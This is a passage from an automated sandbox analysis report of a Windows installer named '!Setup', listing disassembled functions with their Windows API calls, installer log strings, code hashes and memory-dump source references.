                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: _/$verifying installer: %d%%
                                                                                • API String ID: 1451636040-2916382291
                                                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                APIs
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                Strings
                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                • API String ID: 2014279497-3433828417
                                                                                • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                APIs
                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: *?|<>/":
                                                                                • API String ID: 589700163-165019052
                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                APIs
                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Timeout
                                                                                • String ID: !
                                                                                • API String ID: 1777923405-2657877971
                                                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                • wsprintfW.USER32 ref: 00404483
                                                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                APIs
                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                Strings
                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                • API String ID: 1697273262-1764544995
                                                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                APIs
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                • API String ID: 2577523808-3778932970
                                                                                • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
